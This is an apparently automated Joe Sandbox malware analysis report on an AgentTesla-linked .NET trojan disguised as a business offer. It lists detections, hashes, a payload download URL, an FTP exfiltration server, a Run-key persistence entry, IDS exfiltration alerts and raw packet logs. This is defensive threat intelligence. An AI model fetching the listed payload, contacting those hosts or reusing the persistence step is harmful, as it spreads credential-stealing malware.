C:\Users\user\AppData\Roaming\Hxfzsthbd.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\Hxfzsthbd.exe | 34% | ReversingLabs | ByteCode-MSIL.Trojan.Generic
C:\Users\user\AppData\Roaming\Hxfzsthbd.exe | 28% | Virustotal |

                    No Antivirus matches

Source | Detection | Scanner | Label
wymascensores.com | 11% | Virustotal |
ftp.alternatifplastik.com | 3% | Virustotal |

Source | Detection | Scanner | Label
https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe
https://account.dyn.com/ | 0% | URL Reputation | safe
https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe
https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://mathparser.org | 0% | Virustotal |
https://github.com/mgravell/protobuf-neti | 0% | Virustotal |
https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5H | 11% | Virustotal |
https://github.com/mgravell/protobuf-net | 0% | Virustotal |
https://wymascensores.com/dfsd/Wulwtq.mp3 | 11% | Virustotal |
https://mathparser.org/order-commercial-license | 0% | Virustotal |
https://payhip.com/infima | 0% | Virustotal |
https://github.com/mgravell/protobuf-netJ | 0% | Virustotal |
https://payhip.com/infima) | 0% | Virustotal |
http://ftp.alternatifplastik.com | 3% | Virustotal |
https://wymascensores.com | 6% | Virustotal |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
wymascensores.com | 67.212.175.162 | true | false | | unknown
ftp.alternatifplastik.com | 5.2.84.236 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://wymascensores.com/dfsd/Wulwtq.mp3 | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://mathparser.org | Hxfzsthbd.exe.0.dr | false | | unknown
https://mathparser.org/order-commercial-license | Hxfzsthbd.exe.0.dr | false | | unknown
https://github.com/mgravell/protobuf-neti | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/14436606/23354 | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002AD7000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://account.dyn.com/ | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002BDE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1598572369.0000000003D8B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://github.com/mgravell/protobuf-netJ | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://stackoverflow.com/q/11564914/23354; | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://stackoverflow.com/q/2152978/23354 | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://wymascensores.com/dfsd/Wulwtq.mp310NWLLwEk5H | Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.dr | true | | unknown
https://github.com/mgravell/protobuf-net | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1365742147.0000000006360000.00000004.08000000.00040000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1505492848.0000000003972000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://payhip.com/infima | Hxfzsthbd.exe.0.dr | false | | unknown
https://wymascensores.com | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Kuwait Offer48783929281-BZ2.exe, 00000000.00000002.1348809721.0000000003061000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000003.00000002.1478760914.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, Hxfzsthbd.exe, 00000008.00000002.1571205527.0000000002A9C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://payhip.com/infima) | Kuwait Offer48783929281-BZ2.exe, Hxfzsthbd.exe.0.dr | false | | unknown
http://ftp.alternatifplastik.com | InstallUtil.exe, 00000002.00000002.1480659431.00000000025FC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002C0C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000009.00000002.2575392389.0000000002BFE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown

IP | Domain | Country | ASN | ASN Name | Malicious
67.212.175.162 | wymascensores.com | United States | 32475 | SINGLEHOP-LLCUS | false
5.2.84.236 | ftp.alternatifplastik.com | Turkey | 3188 | ALASTYRTR | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528672
Start date and time: 2024-10-08 08:55:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 30s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Kuwait Offer48783929281-BZ2.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@2/2
                    EGA Information:
                    • Successful, ratio: 83.3%
                    HCA Information:
                    • Successful, ratio: 95%
                    • Number of executed functions: 469
                    • Number of non-executed functions: 36
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target InstallUtil.exe, PID 7848 because it is empty
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size exceeded maximum capacity and may have missing disassembly code.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
07:56:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Hxfzsthbd C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
07:56:09 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Hxfzsthbd C:\Users\user\AppData\Roaming\Hxfzsthbd.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
67.212.175.162 | BITUMEN_60-70_-_JUMBO_Specification.exe | malicious | FormBook, NSISDropper | www.northjerseylocksmith.net/2nbp/?ab=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1g60uhCq/kzTYQUQ==&wZHp=LTklpdd0lp
67.212.175.162 | EL-515-_HEAT_TRACING.exe | malicious | FormBook, NSISDropper | www.northjerseylocksmith.net/2nbp/?I8Z=tQVjVQ6bjwqqy2lbRpj5JhQnGfuizPNGdMEYuGKFTCiSTnfJxBy0WSIOyM01nCZIZatbO6YbONw5Q3bQ/V1tnGq8XaOUlQYxDpzveej3TzCy&WN6=OLgLTlRhCRRxTxN
5.2.84.236 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla |
5.2.84.236 | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla |
5.2.84.236 | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla |
5.2.84.236 | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla |
5.2.84.236 | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla |
5.2.84.236 | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla |
5.2.84.236 | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla |
5.2.84.236 | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer |
5.2.84.236 | OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe | malicious | AgentTesla |
5.2.84.236 | Product Specification Details 8576534-872.exe | malicious | AgentTesla |

Match | Associated Sample Name / URL | Detection | Threat Name | Context
wymascensores.com | RFQ-350548 P1-00051538.pdf.exe | malicious | Unknown | 67.212.175.162
wymascensores.com | RFQ-350548 P1-00051538.pdf.exe | malicious | Unknown | 67.212.175.162
wymascensores.com | Yeni Sipari#U015f.pdf.exe | malicious | AgentTesla | 67.212.175.162
wymascensores.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 67.212.175.162
wymascensores.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 67.212.175.162
wymascensores.com | RFQ__PO_PO 24090041-PDF____PDF.exe | malicious | AgentTesla | 67.212.175.162
wymascensores.com | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 67.212.175.162
wymascensores.com | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 67.212.175.162
wymascensores.com | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 67.212.175.162
ftp.alternatifplastik.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer | 5.2.84.236
ftp.alternatifplastik.com | OFFER-876355- Hydraulic Partner, LLC.PDF..........................exe | malicious | AgentTesla | 5.2.84.236
ftp.alternatifplastik.com | Product Specification Details 8576534-872.exe | malicious | AgentTesla | 5.2.84.236

Match | Associated Sample Name / URL | Detection | Threat Name | Context
SINGLEHOP-LLCUS | RFQ-350548 P1-00051538.pdf.exe | malicious | Unknown | 67.212.175.162
SINGLEHOP-LLCUS | RFQ-350548 P1-00051538.pdf.exe | malicious | Unknown | 67.212.175.162
SINGLEHOP-LLCUS | Yeni Sipari#U015f.pdf.exe | malicious | AgentTesla | 67.212.175.162
SINGLEHOP-LLCUS | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 67.212.175.162
SINGLEHOP-LLCUS | sora.arm.elf | malicious | Mirai | 65.62.1.103
SINGLEHOP-LLCUS | http://www.edgeupgrade.com/ | malicious | Unknown | 107.6.168.252
SINGLEHOP-LLCUS | https://hblitigation-news.com/ | malicious | Unknown | 198.143.164.252
SINGLEHOP-LLCUS | https://www.oferdigitaiscom.com/ | malicious | Unknown | 198.143.164.252
SINGLEHOP-LLCUS | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 67.212.175.162
SINGLEHOP-LLCUS | RFQ__PO_PO 24090041-PDF____PDF.exe | malicious | AgentTesla | 67.212.175.162
ALASTYRTR | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PO_9876563647-FLOWTRONIX (FT)UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Richardson Electronics, LTD. PRD10221301UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | PURCHASE ORDER ADDISON-6378397379UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | Teklif-6205018797-6100052155-UUE.exe | malicious | AgentTesla | 5.2.84.236
ALASTYRTR | BROU_Copia de Pago_PDF.exe | malicious | Unknown | 5.2.84.221
ALASTYRTR | BROU_Copia de Pago_PDF.exe | malicious | Unknown | 5.2.84.221
ALASTYRTR | Offer-CNVN-82927-VIETNAM.exe | malicious | AgentTesla, PureLog Stealer | 5.2.84.236

| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| 3b5074b1b5d032e5620f69f9f700ff0e | Urgent inquiry for quotation .exe | malicious | Snake Keylogger, VIP Keylogger | 67.212.175.162 |
| | SPARES REQUISITION.XLSX.exe | malicious | AgentTesla, PureLog Stealer | 67.212.175.162 |
| | CMB FLORIS DETAILS.pdf.exe | malicious | AgentTesla, PureLog Stealer | 67.212.175.162 |
| | SUN ACE TBN VESSEL DETAILS.doc.exe | malicious | AgentTesla, PureLog Stealer | 67.212.175.162 |
| | rPedidoactualizado.exe | malicious | GuLoader, Snake Keylogger | 67.212.175.162 |
| | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | 67.212.175.162 |
| | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | 67.212.175.162 |
| | hloRQZmlfg.exe | malicious | RDPWrap Tool | 67.212.175.162 |
| | 2ngxhElaud.exe | malicious | Xmrig | 67.212.175.162 |
| | https://Vv.ndlevesio.com/vrbU/ | malicious | Unknown | 67.212.175.162 |
                                        No context
                                        Process:C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):975872
                                        Entropy (8bit):5.369427897467404
                                        Encrypted:false
                                        SSDEEP:6144:y3RGg96TatCqrplgjl2xrkGBiTqmqFOrX1SQLYhyb/H3SY34J/JssbACSWTYXPS8:CRGgZLr0JQiTqmqgX1fGDQeTsAiL
                                        MD5:B77B84072A85329568EA006B1B7F4201
                                        SHA1:D9B623C149EEABF151684D852B7D0AB431712C42
                                        SHA-256:46044E8E01547F2456E27E8B15C667F004A2C26FD647F3CECC71DE19015D96C0
                                        SHA-512:F4C27771129CAB42B97799103F22EB75BCC000394A7710D7BE0C0FF62CA08BEBCEECCD01D07187D2B18A8E5934B3650AEFC3F808697AEC3625C66ACF59ACFB2C
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 34%
                                        • Antivirus: Virustotal, Detection: 28%, Browse
                                        Reputation:low
                                        Process:C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.369427897467404
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Kuwait Offer48783929281-BZ2.exe
                                        File size:975'872 bytes
                                        MD5:b77b84072a85329568ea006b1b7f4201
                                        SHA1:d9b623c149eeabf151684d852b7d0ab431712c42
                                        SHA256:46044e8e01547f2456e27e8b15c667f004a2c26fd647f3cecc71de19015d96c0
                                        SHA512:f4c27771129cab42b97799103f22eb75bcc000394a7710d7be0c0ff62ca08bebceeccd01d07187d2b18a8e5934b3650aefc3f808697aec3625c66acf59acfb2c
                                        SSDEEP:6144:y3RGg96TatCqrplgjl2xrkGBiTqmqFOrX1SQLYhyb/H3SY34J/JssbACSWTYXPS8:CRGgZLr0JQiTqmqgX1fGDQeTsAiL
                                        TLSH:9F25A41077EA5956FAFF6BF19DB816554F36BC66BA38CA1E0240028E4A71F188D10F37
                                        Icon Hash:00928e8e8686b000
                                        Entrypoint:0x4ef98e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x6704AA67 [Tue Oct 8 03:43:35 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xef938 | 0x53 | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xf0000 | 0x5b6 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xf2000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |
| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
| .text | 0x2000 | 0xed994 | 0xeda00 | d7220b2a1d9a0c4dbc5292265bf75c65 | False | 0.27656496580746975 | data | 5.3733603080067205 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xf0000 | 0x5b6 | 0x600 | 11353f2fe342ec5d63980224dacbb778 | False | 0.41796875 | data | 4.111738367823075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xf2000 | 0xc | 0x200 | 4b7ff1fbe52a1b9f76abb86544061071 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
| RT_VERSION | 0xf00a0 | 0x32c | data | | | 0.4248768472906404 |
| RT_MANIFEST | 0xf03cc | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347 |
| DLL | Import |
| mscoree.dll | _CorExeMain |
| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
| 2024-10-08T08:56:03.760641+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49742 | 5.2.84.236 | 21 | TCP |
| 2024-10-08T08:56:04.458622+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49758 | 5.2.84.236 | 55304 | TCP |
| 2024-10-08T08:56:04.463815+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49758 | 5.2.84.236 | 55304 | TCP |
| 2024-10-08T08:56:16.368764+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49821 | 5.2.84.236 | 21 | TCP |
| 2024-10-08T08:56:17.062169+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49840 | 5.2.84.236 | 51505 | TCP |
| 2024-10-08T08:56:17.067407+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49840 | 5.2.84.236 | 51505 | TCP |
| 2024-10-08T08:56:25.599272+0200 | 2029927 | ET MALWARE AgentTesla Exfil via FTP | 1 | 192.168.2.9 | 49883 | 5.2.84.236 | 21 | TCP |
| 2024-10-08T08:56:26.305049+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49897 | 5.2.84.236 | 62301 | TCP |
| 2024-10-08T08:56:26.310354+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.9 | 49897 | 5.2.84.236 | 62301 | TCP |
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                        Oct 8, 2024 08:55:58.782461882 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.782529116 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.782812119 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.782893896 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.782953024 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.783056021 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.784014940 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.784099102 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.786655903 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.786828041 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.805459023 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.805586100 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.805645943 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.805712938 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.871366024 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.871488094 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.871597052 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.871666908 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.871682882 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.871805906 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872034073 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872090101 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872097015 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872133970 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872159004 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872214079 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872314930 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872376919 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872448921 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872530937 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872621059 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872700930 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872875929 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872978926 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.872980118 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.872992992 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.873047113 CEST49717443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:55:58.873138905 CEST4434971767.212.175.162192.168.2.9
                                        Oct 8, 2024 08:55:58.873217106 CEST49717443192.168.2.967.212.175.162
